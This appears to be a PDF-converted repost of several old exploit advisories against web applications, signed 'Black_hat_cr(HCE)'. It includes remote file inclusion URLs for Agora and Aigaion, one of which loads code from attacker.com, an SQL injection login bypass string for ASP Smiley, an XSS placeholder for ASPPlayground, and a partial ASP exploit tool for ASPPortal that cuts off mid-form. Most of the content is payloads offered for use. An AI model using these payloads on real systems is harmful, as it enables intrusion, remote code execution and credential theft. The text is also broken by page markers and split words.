version : 1.4 RC1 URL : http://www.agora.gouv.fr Based on the free software Spip, Agora is a free software of management of contents for Internet developed in php, which makes it possibl
Trang 1version : 1.4 RC1
URL : http://www.agora.gouv.fr
Based on the free software Spip, Agora is a free software of management of contents for
Internet developed in php, which makes it possible to put in place and to manage quickly
and with lower cost of the Internet sites, Intranet or extranet
-
Vulnerability:
~~~~~~~~~~~~~~
I found vulnerability in modules/Mysqlfinder/MysqlfinderAdmin.php
-modules/Mysqlfinder/MysqlfinderAdmin.php -
PHP Code:
<?
include_once($_SESSION["PATH_COMPOSANT"]."Commun/Template.in c")
-
Input passed to the "$_SESSION["PATH_COMPOSANT"]" parameter in
Mysqlfinder.php is not
properly verified before being used This can be exploited to execute
arbitrary PHP code by including files from local or external
resources
Proof Of Concept:
~~~~~~~~~~~~~~~
Trang 2PHP Code:
http://target.com/[agora-1.4-path]/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_CO MPOSANT]=http://attacker.com/inject.txt?
Black_hat_cr(HCE)
Aigaion <= 1.2.1 (DIR) Remote File Include Vulnerabilities
Code:
Software:Web based bibliography management system
Download link: http://sourceforge.net/projects/aigaion/
script:_basicfunctions.php
author: navairum
-
The script _basicfunctions.php does not specify a value for the $DIR variable
before including it
Vulnerable code:
//if this script is not called from within one of the base pages, redirect to frontpage require_once($DIR."checkBase.php");
/* This function leads the browser to the given location */
-
Exploit:
http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt?
http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt?
Black_hat_cr(HCE)
Trang 3ASP Smiley 1.0 (default.asp) Login ByPass SQL Injection Vulnerability
Code:
******************************************************************
*************
# Title : ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann
******************************************************************
*************
Example:
###http://[target]/[path]/admin/
UserName: ' union select 0,0,0,0,0,0,0,0 from categories
Black_hat_cr(HCE)
ASPPlayground.NET Advanced Edition 2.4.5 Unicode Xss
script : ASPPlayground.NET Advanced Edition 2.4.5 Unicode
Xploit:
Code:
http://[site]/[forum_path]/calendar.asp?calendarID=|Xss|
black_hat_cr(HCE)
ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
PHP Code:
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
Trang 4<%
'==========================================================
=====================================
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit '[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit1.asp
'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirs iniz
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum '==========================================================
=====================================
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
%>
<html>
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
<head>
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
Trang 5
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face="Verdana\" size=
\"1\" color=\"#008000\">There is a problem The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASP Portal <=</b>v4.0.0(default1.asp) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0"
style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.backg round='#808080';" onmouseout="javascript:this.style.background='#808000';"> <font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Ex ample:[http://x.com/path]</b></font><p>
Trang 6<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User